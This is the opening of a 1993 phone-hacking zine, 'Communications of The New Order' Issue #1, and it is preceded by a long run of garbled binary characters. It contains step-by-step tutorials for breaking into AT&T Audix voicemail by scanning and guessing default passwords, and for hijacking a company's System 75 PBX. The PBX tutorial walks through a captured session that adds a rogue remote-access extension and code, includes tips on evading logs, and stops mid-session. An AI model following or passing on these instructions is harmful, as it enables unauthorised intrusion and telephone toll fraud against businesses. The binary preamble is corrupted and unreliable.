 M BOBO ˥    d H H H H H H                            N       H         ˉ                ˖E            B.
  7Pr    ϺnJG>    @3B3\DFG>                       ˨                      -       Z                                                 l    `   E            B.
  7Pr    ϺnJG>    @3B3\DFG>   x    H H    @Rd(   hh    @    d         '                                                                                                                 O   O                         l     /   j          0         iWt                           N N                                   XT       @Wt`                    H            ͇        j                    |                X  !             ( | DSET   O  b  b       i GE    ˯             d (              ͺ (              ͏ (              d (              G| (               (               (              t (              ˆ (               D (              #ˮ (              '  (              * (              -ˏ (              1˧ (              4ˀ (              7 (              :ͻ (              > (              Bl (              Ch (              Fd (              J` (              N0\ (              QHX (              TT (              XP (              \L (              _H (              bD (              ed@ (              h< (              l8 (              p4 (              t0 (              x, (              z( (              }$ (                (              ь (               (              Q (              [ (              M (               (               (                (              ʸ (              ʯ (              q (              ʽ (               (               (              ʉ (              ʇ (              mʋ (               (              Iʑ (              ʖ (               (              Pʻ (              ʃ (              ʿ (              ʺ (               
ʏ (              ʥ (              ʀ (              ͹ʨ (              Ӄʮ (              lʧ (              [ʆ (              > (               (              (              (             	1 (             
  (             q (              P              Z(           M       N                                  >      ?                              (      )      *      +      S      T                                          (      )      _      `                                          .      /      \      ]                                                            	      ?      @      j      k                                                                              W      X                              $      %      o      p                                          c      d                                                	       	      	      	R      	S      	n      	o      	      	      	      	      	      	      	      	      	      	      
/      
0      
{      
|      
      
                  c      d                              T      U                              
=      
>      
      
      
      
      
      
      
      
      6      7                                          D      E      F      G                              2      3                                           Z      [      \      ]                                          $      %      r      s                                                                        	      R      S                              /      0      1      2      3      4      5      6      7      8      J      K      ]      ^                              9      :                                          f      g                              J      K                                                                                                                              .      /      m      n                              !      "      ]      ^                                          M      N                                                                                                      Q      R                              9      :                                                      -      .      {      |                                           R      S                                                             !      :      ;      T      U      V      W                               D       E                                  !0      !1      !      !      !      !      !      !      !      !      "5      "6      "      "      "      "      "      "      "      "      "      "      #
      #      #      #
      #Y      #Z      #      #      #      #      #      #      $      $      $3      $4      $e      $f      $      $      $      $      $      $      %*      %+      %[      %\      %      %      %      %      &      &
      &=      &>      &p      &q      &      &      &      &      &      &      '      '       '!      '"      'K      'L      'u      'v      '      '      '      '      (       (!      (Z      ([      (      (      (      (      (      (      (      (      )3      )4      )~      )      )      )      *      *      *m      *n      *      *      +      +	      +
      +      +2      +3      +d      +e      +      +      +      +      +      +      ,"      ,#      ,h      ,i      ,j      ,k      ,l      ,m      ,      ,      ,      ,      ,      ,      ,      ,      -L      -M      -      -      -      -      .2      .3      .4      .5      .a      .b      .      .      .      .      /      /      /?      /@      /x      /y      /      /      /      /      /      /      00      01      02      03      04      05      0O      0P      0j      0k      0l      0m      0      0      1      1      1Q      1R      1S      1T      1}      1~      1      1      1      1      2      2      2R      2S      2      2      2      2      3      3      3P      3Q      3      3      3      3      3      3      3      3      3      3      3      3      4       4      4      4      4      4      4^      4_      4      4      4      4      5<      5=      5      5      5      5      5      5      5      5      6@      6A      6      6      6      6      7%      7&      7O      7P      7Q      7R      7{      7|      7      7      7      7      7      7      7      7      81      82      8~      8      8      8      9      9      9*      9+      9v      9w      9      9      9      9      9      9      9      9      :      :      :      :      :      :      :      :      :      :      :O      :P      :      :      :      :      ;      ;      ;;      ;<      ;z      ;{      ;      ;      ;      ;      ;      ;      <       <      <      <      <      <      <^      <_      <      <      <      <      =D      =E      =      =      =      =      >0      >1      >}      >~      >      >      >      >      ?      ?
      ?_      ?`      ?      ?      ?      ?      @F      @G      @      @      @      @      A      A      A      A      A)      A*      AK      AL      Am      An      A      A      A      A      A      A      A      A      A      A      B      B      B      B      B-      B.      B/      B0      B1      B2      BA      BB      BQ      BR      Ba      Bb      B      B      B      B      B      B      B      B      B      B      C      C      C3      C4      Cs      Ct      Cu      Cv      Cw      Cx      C      C      C      C      C      C      D      D      DE      DF      D{      D|      D      D      D      D      D      D      D      D      D      D      E      E      E      E      E      E       E>      E?      E      E      E      E      F&      F'      FU      FV      Ff      Fg      Fw      Fx      F      F      F      F      F      F      G       G      GD      GE      G      G      G      G      H
      H      HP      HQ      H      H      H      H      H      H      H      H      I1      I2      IO      IP      IQ      IR      IS      IT      Ip      Iq      I      I      J      J      J      J      JT      JU      J      J      J      J      J      J      K       K!      Kn      Ko      K      K      L
      L      LV      LW      L      L      L      L      L      L      L      L      L      L      MF      MG      Ma      Mb      M      M      M      M      ND      NE      N      N      N      N      N      N      N      N      O
      O      OY      OZ      O      O      O      O      O      O      O      O      P      P      P+      P,      Pv      Pw      P      P      P      P      P      P      Q      Q      Q%      Q&      QH      QI      Qk      Ql      Q      Q      Q      Q      Q      Q      Q      Q      R      R      R=      R>      R`      Ra      R      R      R      R      S      S      Sg      Sh      S{      S|      S      S      S      S      TJ      TK      T      T      T      T      T      T      U-      U.      Uw      Ux      U      U      V      V      V>      V?      V      V      V      V      V      V      V      V      V      V      V      V      WJ      WK      W      W      W      W      X      X      Xh      Xi      X      X      X      X      X      X      Y      Y	      Y3      Y4      Y^      Y_      Y`      Ya      Ys      Yt      Y      Y      Z      Z      ZK      ZL      Z      Z      Z      Z      [      [      [_      [`      [      [      [      [      [      [      [      [      [      [      \      \      \d      \e      \      \      \      \      ]      ]      ]R      ]S      ]g      ]h      ]      ]      ]      ]      ]      ]      ^      ^      ^=      ^>      ^i      ^j      ^      ^      ^      ^      ^      ^      ^      ^      _      _      _`      _a      _b      _c      _d      _e      _      _      _      _      `      `      `      `	      `L      `M      `      `      `      `      a	      a
      aH      aI      an      ao      a      a      a      a      a      a      a      a      b      b      be      bf      bg      bh      bi      bj      b      b      b      b      c4      c5      cR      cS      c|      c}      c      c      c      c      c      c      c      c      c      c      c      d       d      d      d      d      de      df      dq      dr      d      d      e      e      e2      e3      ea      eb      ec      ed      e      e      e      e      e      e      e      e      f6      f7      fy      fz      f      f      f      g       gB      gC      g      g      g      g      g      g      g      g      hA      hB      hX      hY      h      h      h      h      h      h      h      h      h      h      iA      iB      i      i      i      i      j      j      j/      j0      j1      j2      j      j      j      j      k      k      kh      ki      k      k      l      l      l9      l:      l;      l<      lM      lN      lq      lr      l      l      l      l      l      l      m@      mA      m      m      m      m      m      m      n      n      n      n      n      n      n"      n#      nO      nP      n      n      n      n      n      n      o      o      o      o       om      on      o      o      p
      p      p\      p]      p      p      p      p      q-      q.      q/      q0      qA      qB      qe      qf      q      q      q      q      q      q      r4      r5      r~      r      r      r      r      r      s0      s1      sO      sP      s      s      s      s      s      s      s      s      s      s      t      t      tf      tg      t      t      t      t      u      u      u      u	      uV      uW      u      u      u      u      vC      vD      v      v      v      v      w      w      w      w      w(      w)      wL      wM      wj      wk      w      w      w      w      x      x      xe      xf      x|      x}      x      x      x      x      x      x      x      x      y      y      y.      y/      yX      yY      yp      yq      y      y      y      y      y      y      y      y      y      y      z      z      za      zb      z      z      z      z      z      z      z      z      z      z      {
      {      {[      {\      {]      {^      {      {      {      {      {      {      {      {      |       |!      |"      |#      |M      |N      |      |      |      |      }#      }$      }j      }k      }      }      }      }      }      }      ~H      ~I      ~      ~      ~      ~      ~      ~      ~      ~      ~      ~      0      1                                                                   N      O                  Č      Ĝ                  f      g                              ś      Ź                  !      "      m      n      ǐ      ǚ                              -      .      {      |      ɿ      ɡ                  K      L      `      a      b      c      z      {      |      }      Ѣ      ѣ      Ѡ                        ь      ќ                   !      "      #      $      %      &      '      (      d      e      ֢      ֣      և      ַ                  [      \                                          ܢ      ܣ      ܩ      ܙ      ܘ      ܯ      D      E                              +      ,      w      x                              Q      R                                                                        
      (      )      b      c                                          P      Q                                          ?      @      z      {                              ,      -      j      k                              #      $      ]      ^      _      `      a      b      m      n      y      z                              Z      [      q      r      s      t      u      v                                                                  *      +      U      V      W      X      Y      Z                              <      =                              !      "      K      L      M      N                              :      ;                              "      #      F      G      H      I                              1      2      ~                                    e      f                                          H      I                              *      +      x      y                                          "      #      $      %      &      '      w      x      y      z      {      |      }      ~                                          ;      <      z      {                              7      8      v      w                                                                              `      a                                                                   +      ,      v      w                  
                                           !      /      0      x      y                                                                  Q      R                                                                  ,      -      y      z                              [      \                                                                                          *      +      >      ?      R      S      f      g      z      {                                                                              1      2      3      4      5      6      <      =      C      D                                                                  3      4      L      M      N      O      _      `      p      q                              Y      Z                              )      *      +      ,      -      .      =      >      M      N                              8      9                  ߓ      ߔ            ߸                                                       f      g                              K      L                                                  !      4      5      6      7      8      9                                                                  g      h                              O      P                                                      %      &      W      X                                                                  $      %      S      T      V      W      ƶ            ƾ      ƈ      .      /      1      2      I      J      _      `      b      c      ب                        H      I                                                      ^      _                                    	
      ;      <      v      w                              V      W      X      Y                              I      J                              5      6                                          T      U                              &      '      )      *      z      {                                                                              N      O                                                      l      m                  
            \      ]                              K      L                              =      >                              #      $      r      s                  
            Y      Z                              E      F      M      N      P      Q      [      \      f      g      i      j                  
            Z      [                              0      1      ~                                    H      I                                          &      '      t      u                              \      ]                              H      I                                          $      %      t      u                              a      b                                          >      ?                              $      %      s      t                              #      $      &      '      G      H      h      i      k      l                              Q      R                              9      :                  ò            &      '      w      x      խ      ի                  Y      Z      |      }                                          .      /      P      Q      q      r                                          *      +      -      .      [      \      |      }                                                      b      c                                                                              k      l                  
            U      V                              E      F                                                                              S      T                              <      =                                                      6      7      d      e      g      h                               J      K                              -      .      ~                                     o      p                  	      
      U      V      c      d      f      g                              N      O                              9      :                                           W      X      Z      [                              A      B                              *      +      y      z                              `      a                              @      A      C      D                                                      h      i                              V      W      Y      Z                              ?      @                        ³      %      &      q      r            ʿ                  "      #      %      &      u      v                                          A      B                  ˼      ˇ      .      /      u      v      ȶ            ȩ      ș      Ⱦ      Ȉ      D      E                  ͛      ͹      .      /      {      |      Π                        B      C      E      F                  Ϸ      ς      /      0      D      E      G      H                  ̉            1      2                  ӌ      Ӝ                  e      f      h      i      Ԑ      Ԛ            	      X      Y                              B      C                              ҡ      Ҭ      Ҝ      Җ      ғ      Ҕ                   k      l      ڎ      ڏ                  D      E      G      H                  ۺ      ۝            ۿ            
      [      \      ٕ      ٶ                  D      E                                                            	                  [      \                                                      d      e                                                  !      o      p                                                                                    	      >      ?      u      v      w      x      y      z            п                  N      O                        ן                  #      $      %      &      k      l      ݙ      ݴ      ݽ            +      ,      l      m                                          c      d                  ޫ      ޻      ޯ            (      )      O      P                                          )      *      t      u                              K      L                             )     *     u     v               
          S     T                         /     0     {     |                         ]     ^                         !     "     #     $     %     &     v     w     x     y     z     {                                                                           `     a                         C     D                                             #     $     %     &     E     F                         	1     	2     	h     	i     	j     	k     	     	     	     	     
"     
#     
r     
s     
     
     	     
     D     E     F     G                                             6     7                         
      
!     
n     
o     
     
                                   l     m                         S     T                         :     ;     <     =                         !     "     p     q                                                                       !     "     #     [     \                                                                           *     +     6     7                                    m     n               	     
     U     V     d     e     f     g     h     i       
                   l  ȏ  ȧ  Ȩ  ȿ  ȥ  zȻ  jȺ  #[Ȗ  'Gȃ  +C  //  3*ȇ  7ȑ  :Ƚ  >ȋ  B   F ȉ  J    N  R  Vȸ  Z  ^  b  f  jS   nD   rD(  v/  z0  ~$  ň8  ,  @  4  H  <  P  D  X  eL  ^d  :  8T  )  &           Â          s  Z  N  +        ݼ    | x t p         ______         ______     ____________       ____      ___     ______

      /  ____|\      /      \   |____    ____|\    /   | \  /   / |  /      \

    /  /  ____\|   /   __    |\  \_/   /|_____\| /     |  /   /  / /   __    |\

  /  /  /        /   /__/   /  | /   /  /      /   /|  |/   /  / /   /__/   / |

/  /__/______   |         /  / /   /  /      /   /  |     /  /  |         /  /

|____________|\ |\_____ /  / /__ /  /      /___/  / |___/  /    |\_____ /  /

|_____________\| \|____| /  |___| /       |___ |/   |___|/       \|____| /



                                   ____

                                  /    \ --- 

                                /        \   \ __  

                              /     /\     \   \  \   

                           _/______|_/    /   /   / \  

                          |          |  /   /   /  / 

                          |    ---\( |/   /   /  / 

                          |         \|\(/\(/ \(/    

                            |                   |   

                          /                  /

                        /    \             /

                      /         \     ___/

                                     /  

                                   /    

                                 /      



                      Communications of The New Order

                                 Issue #1

                               Summer, 1993



                   "The best things in life are toll-free."

                                                     AT&T





             Editor......................................DeadKat

             Cheerleader.................................Karb0n

             Rebel without a pause.......................Panther Modern

             Fund raiser.................................Cavalier

             The K-radiest...............................Jewish Lightning

             Flatline engineer...........................Nuklear Phusion

             
  
             Thanks to:  Phreddy!, god, Control-C (the new one), Nitro-187,

             RDT (you guys rule), VirtualCon (NOT!), Lucifer and the Coders,

             Disk Jockey, Visionary, Kamikaze, John Falcon, Cosmos, Pee Wee,

             and all the negligent system administrators of the world...







<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>

                          

                          

                          

                          ___/\/INTRoDUCTIoN\/\___





Welcome to CoTNo!  This publication is the prodigy of The New Order, Colorado's

best hacking group.  We have created this 'zine to help teach what we have

learned and discovered from our combined years of experience.  This is not

intended to be an ultra-technical collection of barely useful information, but

rather a forum for spreading current H/P/A knowledge and practices to the 

newer members of the 'scene'.  You will not find mind-numbing overly technical

reports here.  Nor will you be wasting your time and hard-drive by downloading

useless articles on non-H/P/A topics like gambling and car theft.  All articles

contained in CoTNo have useful applications in today's heavily computerized

and automated society.  Some well experienced hackers may find these texts to

be old hat, but we feel the scene has been dying because of a lack of basic

hacking tutorials.  The goal of the writers of this publication and the 

members of TNo is to educate and enlighten in order to recreate the booming

scene of the 80's.



The New Order (TNo) are the main writers and supporters of this 'zine.  We

are composed of hackers, phreakers, and "hairy-eyed anarchists" from the

Colorado area. We recently received some minor publicity in a comment found

in The Seed Magazine: Denver's Rag of Underground Culture.  The following is

an excerpt from the June/July '93 issue:



     "Hackers - no longer a small underground phenomenon, these computer whiz-

     kids have b  ecome a highly organized network of post-modern renegades.

     With everything in our lives being computerised, today's hackers are able

     to gain unbelievable access into just about everything.  They communicate

     to each other via BBS (Bulletin Board System) and trade tips on everything

     from music to ripping off the phone company.  The buzz around town is

     about Flatline, a BBS run by the hacking crew, TNO."



Not exactly the front page of Time, but at least this was a POSITIVE statement

by the media on the hacking phenomenon.



We accept submissions to CoTNo from anyone who has a willingness to teach and

can get on Flatline.  There will also be a CoTNo mailing address soon.  This

mag' will be published on a quarterly basis.





DISCLAIMER

~~~~~~~~~~

This publication contains information pertaining to illegal acts.  The use

of this information is intended solely for evil purposes.  The editors, 

writers, and publishers of this publication take no responsibility for any

leg  al acts committed using this information.  If you plan on using this 

information for destructive purposes, read on.  Otherwise...FUCK OFF!









TABLE OF CONTENTS

~~~~~~~~~~~~~~~~~

 1.  CoTNo Introduction.......................................DeadKat

 2.  How to Hack Audix VMB's..................................DeadKat

 3.  System 75 Hacking (An Online Tutorial)...................Panther Modern

 4.  UNiX Default List........................................TNO Hacking Crew

 5.  HoW To MAiL FoR FREE.....................................Karb0n

 6.  How to Red Box...........................................DeadKat

 7.  Field Phreaking I........................................The Third Cartel

 8.  Field Phreaking II.......................................The Third Cartel

 9.  How to Make a ZAPPER GUN.................................Panther Modern

10.  Comments on Phrack 42....................................Karb0n

11.  CoTNo Conclusion.........................................DeadKat











<CoT  No>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ 

                 (*)                                 (*)\|   

                 (*)            HOW TO HACK          (*)\|

                 (*)               AUDIX             (*)\|

                 (*)               VMB'S             (*)\|

                 (*)                                 (*)\|

                 (*)                By               (*)\|

                 (*)            |>ead |<at           (*)\|

                 (*)                                 (*)\|

                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\|

                  \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\|

                   





PREFACE

-------



        A VMB, in case you don't know, stands for Voice Mail Box.  A VMB works

like a multiuser answering machine.  A company will purchase a VMB so its

employees will be able to leave messages to each other.  Each employee will

have a separate box number assigned to him and be given a "default password"

for his VMB.  The employee is then able to leave a greeting on his mail box

and change the password.  Whenever someone calls him, they will get his VMB

if he does not answer his line.  The caller can then leave a message to the

employee.



        Hackers and Phreaks steal VMB's so they can contact each other and 

spread information around.  You can give them to friends, you can trade them

for access on boards, or keep them for yourself.  Some boxes even have the 

ability to call out so you can use them for phreaking!



        The Audix or Audio Information Exchange system sold by AT&T is one of 

the better VMB's on the market.  It has many message options, it is highly 

configurable, and has many security options.  Lucky for us, it also has some 

neat options that make it very easy to hack!





SCANNING FOR AUDIX VMB'S

------------------------



        To find a V  MB, you will have to scan.  Either pick a popular business

exchange in your area code (like 669, 721, 220, etc.), or try the riskier 800 

area code.  The 800 area code VMB's are better but Ma Bell's computers (ESS) 

keep a list of any number that makes excessive calls to 800 numbers.  Do your

scanning at night so you won't have to worry about reaching someone at their

desk.  Start at 0000 and work your way to 9999 sequentially.  Write down any 

interesting numbers you find.  If you get some kind of answering machine, mark

it as a possible VMB.



        When you're done scanning, recall each of the possible VMB's.  Some 

Audix systems will answer with the greeting "Welcome to Audix..." while others

will just begin with the employee's greeting.  Press *7 (the asterisk then the

seven).  You will hear "Welcome to Audix..." if it is an Audix VMB.





WHAT TO DO ONCE YOU FIND ONE

----------------------------



        Now that you have a list of Audix VMB numbers, call one of them and

g  et yourself a box!  When you first reach a box, you are in record mode.  You

have a number of options available to you in this mode:



                KEY             ACTION

                ---             ------

                1               Begin recording.

                1               Stop recording.

                *#              Approve message.

                *1              Review message.

                *3              Delete message.

                2               Rewind message.

                3               Playback message.

                6               Advance message a few seconds.

                5               Replay the last few seconds.

                4               Turn volume up.

                7               Turn volume down.

                8               Slow down message.

                9               Speed up message.



You also have the following Audix master functions available to you:



                KEY             FUNCTION

                ---             --------

                *R              To retrieve a box.

                *H              To get help at any time.

                *T              To transfer to another box.

                *W              To have the system wait.

                **N             To access the directory.





        To get your own box, you must first find some empty boxes.  While you

are in record mode, press *T.  The system will tell you to enter either a 

three or four digit extension number and the pound sign.  Remember

how many digits the box numbers are.  Now press **N. This will take you to the 

directory.  Press *A to look up boxes by their extension.  Start scanning for

boxes sequentially.  Start at either the highest number or lowest number (999

or 000) and work your way to the other end.  To scan a box number, enter the

box number and press the pound sign.  You will hear one of three responses:



        1.  The name of the box owner.

        2.  "Box number XXX is not a valid box".

        3.  "Box number XXX".



If you hear either response one or response two, go on to the next box.  If 

you hear response 3, BINGO!  You just found an empty box so write it down and

move on to the next box.  After you are finished scanning, press *#.





HOW TO BREAK INTO AN EMPTY BOX

------------------------------



        While in record mode, press *R.  You will hear a message like "Welcome

to the Audix Activity Menu..."  Enter one of the empty box numbers you found

and press the #.  It will now tell you to enter your password and press the #.

The password will be a three or four digit combination of numbers. The default 

password is usually something obvious so try some of the following:



                   PASSWORD            NOTE

                   --------            ----

                   Box Number          This is the most common 

                   No password         Just press pound, also common

                   1234                  \

                   9999                  > Occasionally

                   1111                /



Once you figure out the default password for one empty box, you can access all

the boxes you found during your scan by using the default.





WHAT TO DO ONCE YOU'RE IN

-------------------------



        You will know when you have broken into a box when you hear a message

like "Extension XXX, you have no new messages."  You can now set up your 

personal box.  The following is a list of the functions available to you:



                KEY             FUNCTION

                ---             --------

                 1              Create a message.

                 2              Retrieve messages left for you.

                 3              Change your greeting.

                 4              Check out messages left by you.              

                 5              Change password.

                 6              Change call notification information.

                **R             Relog into your box.

                **N             Enter the directory.



The first thing you should do is change your password!  You don't want 

anybody to hack YOUR box.





ADVANCED AUDIX

--------------



        Sometimes you will find boxes that have no name, but don't have a 

default.  Transfer to the box and check it out.  It might be a carrier.

Audix's are usually found on System 75/85 PBX's which can be accessed via

modem.  Call it with your modem and if you get a prompt that looks like 

Logon: you have scored big.  A tutorial on hacking System 75/85's can be

found elsewhere in this 'zine.



If you transfer to the box and you hear a quick beep without hearing any type

of greeting, you have found a bridge.  Have a friend call the system and

transfer to the same box after you have and see if you can talk to each 

other.  All System 75/85's have the capability to bridge extensions but this

option is rarely used.  If you find a bridge, only call it late at night so

you don't stumble into a valid conference.



                                        

CONCLUSION

----------



        You should be a master at hacking Audix VMB's now.  You can use many 

similar techniques on other brands of VMB's too.  Be conservative with your

boxes.  The more boxes you snag from one company, the more likely they will

notice you and shut you out.  If you do end up with 500 boxes, use them to 

trade with.  You can get better access on boards, money, or equipment for 

them.  Have Phun!

__________________________________________________________________________

(C)opywrong 1993, DeadKat Inc.

All wrongs denied.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                     









                          /\/System 75 hacking\/\

                          /\/An online tutorial\/\

      -=Captured from a very generous company located in Denver=-

           -=My thanks go out to them for use of their PBX=-

                  --Intro by Panther Modern TNO/TBF--

          --Hacking of the system by Panther Modern TNO/TBF--

                --Editing and revising from |>ead|<at--

  >Special thanks to Dead Kat for teaching me how to do this stuff..<



  

INTRO

~~~~~

  System 75/85's..The gateway to the world of the PBX...If one can hack these 

machines, one has the ability to generate many codes for himself, and his 

fellow phreakers/hackers to use and enjoy.  Hacking these machines can be 

very fun, but if one does not know what he's doing, it could be frustrating 

and potentially risky. That's why I am writing this text.  This file includes 

captures from two hacks I did.  In the first hack, I will show you how I went 

thru, saw that the company did not have a PBX, and made my own for my own 

personal gateway to free LD.  In the second hack you will see how I simply 

looked, saw the PBX, and quickly found the correct trunk, changing nothing.  

  

  Version   2 is definately the better way to hack a system.  If you change 

things, it will show up on the system log.  Along comes a system 

administrator to read the log, and yer busted.  But if you don't change 

anything, no one will ever know you were there...Of course, many times, it 

becomes necessary to change things, if the company doesn't already have a PBX 

installed...You must make your own.  For ease of reading, I have gone thru 

and edited/commented on everything I did in both hacks.  Hopefully I made 

it easy to understand..Good luck hacking System 75!



                 

CONVENTIONS USED IN THIS ARTICLE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.  The command prompt is

     enter command:



2.  Resulting screens begin and end with dashes.                



3.  Comments are enclosed by brackets. [ ]



4.  Emulation is Bell 513.





THE FIRST HACK

~~~~~~~~~~~~~~

CARRIER 1200  

[1200 baud is a good way to recognise a sys75]



KEYBOARD LOCKED, WAIT FOR LOGIN

Login: XXXXX

Password: XXXXXX   X

[I don't want to include any passwords in this file]

Terminal Type (513, 4410, 4425): [513]

[513 is a default bell prefix.  It is about the same as VT100]





___________________________________________________________________________

                        

                        

                        

                        Copyright (c) 1986 - AT&T

                   Unpublished & Not for Publication

                          All Rights Reserved







___________________________________________________________________________

[I like this screen...<G>]

 

 

 enter command: display rem<<

[All you really need is DIS, not display.  Try DIS HELP, also, LIST HELP]

____________________________________________________________________________

display remote-access                                           Page  1 of  1

                                REMOTE ACCESS

               

               

               Remote Access Extension:

                   Barrier Code Length: 4

BARRIER    CODE ASSIGNMENTS (Enter up to 10)

        

        Barrier Code    COR                    Barrier Code    COR

     1:                 1                    6:                 1

     2:                 1                    7:                 1

     3:                 1                    8:                 1

     4:                 1                    9:                 1

     5:                 1                    10:                1





____________________________________________________________________________

[As you can see, no remote access ports are set up.  No PBX, and no codes.

Code length is four digits.]





 enter command: dis trunk 1

[we will now look at all 99 trunks, to find the rite one to use..]

_____________________________________________________________________________



display trunk-group 1                                           Page  1 of  5

                                TRUNK GROUP



Group Number: 1                    Group Type: co            SMDR Reports? y

     Group Name: main pool                   COR: 1                      TAC: 76

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service:

Queue Length: 0                                      Incoming Destination: 200

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: toll    Allowed Calls List? n



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? n

_____________________________________________________________________________

[First we look at night service, and incoming destination, recording the

numbers to hardcopy.  We also note the trunk type, and COR number]

  



[We type <ESC>[U to get to the next page of text.]

_____________________________________________________________________________

display trunk-group 1                                             Page  2 of  5

                                 

                                 TRUNK GROUP 



GROUP MEMBER ASSIGNMENTS

                 

                 Port      Name         Mode         Type    Answer Delay

              1: A0301    xxxxxxx

              2: A0302    xxxxxxx

              3: A0303    xxxxxxx

              4: A0304    xxxxxxx

              5: A0305    xxxxxxx

              6: A0306    xxxxxxx

              7: A0307    xxxxxxx

              8: A0308    xxxxxxx

              9: A0401    xxxxxxx

             10: A0402    xxxxxxx

             11: A0403    xxxxxxx

             12: A0404    xxxxxxx

             13: A0405    xxxxxxx

             14: A0406    xxxxxxx

             15: A0407    xxxxxxx

_____________________________________________________________________________

[Where name is, there will be fone numbers.  Record these so you will know

what number to dial in to while hacking.  I have removed the numbers for

security reasons.]

[Same process was done on the remaining trunks.  Always scan all 99, even

if you stop finding some.  There may be a good one...]

[If the trunk has both a night extension and a phone number listed on page

2, make a note of it.  Use the command dis cor to see the trunk's

restrictions.  FRL should equal 7.  If not, change it to 7 or find another

trunk.]

[BTW - When done looking thru pages, type <ESC>Ow to return to prompt]

[What we found was a trunk which looked as if it was fairly unimportant.

Also, it didn't have a night extension.  This is important, because we want

to set up an after-hours PBX.  If we take over a daytime extension, the PBX

would most likely go down within 24 hours.]

[If, under the name column, there are strange numbers, like AT204, just 

disregard them, and go on to the next trunk, these are internal extension

numbers.]





 enter command: dis dial<<

[This displays the dial plan for the system.  It will show you which digit

to start your remote extension (shown later) with.  Use a digit that says

EXTENSION.  As you can see, that digit here is 2.]

____________________________________________________________________________

display dialplan                                                  Page  1 of  1

                               

                               

                               DIAL PLAN RECORD

                             Area Code: XXX

                 ARS Prefix 1 Required? y

                  Uniform Dialing Plan? n



FIRST DIGIT TABLE

Digit  Identification   Number of       Digit  Identification   Number of

                        Digits                                  Digits

    1: fac                3               7: tac                  2

    2: extension          3               8: tac                  1

    3:                    0               9: fac                  1

    4:                    0               0: attendant            1

    5:                    0               *: fac                  2

    6: tac                2               #: fac                  2



_____________________________________________________________________________ 

 

 

 enter command: dis allow

[This will display the allowed calls/area codes.  If your PBX does not work

later on, check here, and try to add the correct area code you want to call]



___________________________________________________________________________

display allowed-calls                                             Page  1 of  1

                   

                   ALLOWED CALLS LIST (FOR TOLL RESTRICTION)

AREA/LONG DISTANCE CARRIER CODES ( Enter up to 10 )

         

         1: 800                         6:

         2: 911                         7:

         3: 950                         8:

         4:                             9:

           5:                            10:





____________________________________________________________________________

[This system can call 800's, 950's, 911, as well as long distance numbers.]





 enter command: list help

____________________________________________________________________________

Please enter one of the following object command words:



abbreviated-dialing      groups-of-extension      personal-CO-line

aca-parameters           hunt-group               pickup-group

bridged-extensions       intercom-group           station

configuration            measurements             term-ext-group

coverage                 modem-pool               trunk-group

data-module              performance

Or press CANCEL to cancel the command

  Object command word omitted; please press HELP





____________________________________________________________________________

[List is similar to DIS, except that none of its factors can be changed.]





 enter command: list groups-of-  extension 200

[We are attempting to find an empty extension to set up the remote on.  Find

an extension that is not being used and write it down.  The screens have been

omitted for brevity's sake.]

[We will now set up a remote extension.]

 

 enter command: list group 299<



list groups-of-extension 299

  Extension not assigned

[We first found an empty extension]



 enter command: ch rem<

[we proceeded to add it to the remote access.  I will put {'s around what

we added.]

____________________________________________________________________________

change remote-access                                              Page  1 of  1

                                

                                REMOTE ACCESS



               Remote Access Extension: {299}

                   Barrier Code Length: 4

BARRIER CODE ASSIGNMENTS (Enter up to 10)

        

        Barrier Code    COR                    Barrier Code    COR

     1: {3323}          1                    6:                 1

     2:                 1                    7:                 1

     3:                 1                    8:                 1

     4:                 1                    9:                 1

     5:                 1                   10:                 1

  

  Command successfully completed

_____________________________________________________________________________

[We added in our code, and our remote access extension, and then save

by typing <ESC>SB ]  

[We added our extension, and our code (barrier code)] 





 enter command: dis trunk 9<<

[We looked back on our hardcopy notes, and decided that trunk 9 would be 

appropriate to add our code to.  We re-display just to make sure]

____________________________________________________________________________

display trunk-group 9                                             Page  1 of  5

                                

                                TRUNK GROUP



Group Number: 9                      Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service:

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? <

display trunk-group 9

  Command aborted

____________________________________________________________________________





 enter command: ch trunk 9

[Once again, changes I made will be in {'s]

____________________________________________________________________________

change trunk-group 9                                              Page  1 of  5



                                TRUNK GROUP



Group Number: 9                    Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service: {299}

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervi  sion Timeout:                    Suppress # Outpulsing? n

  Command successfully completed

____________________________________________________________________________

[All we had to do was add our remote extension to Night Service]

[..And save it with <ESC>SB ]

[You should now have a ready-to-use PBX!!!!!!  Check page 2, that's yer after 

hours dial in number.]

 



 enter command: dis trunk 9

[We check again to make sure our changes came thru correctly]

____________________________________________________________________________

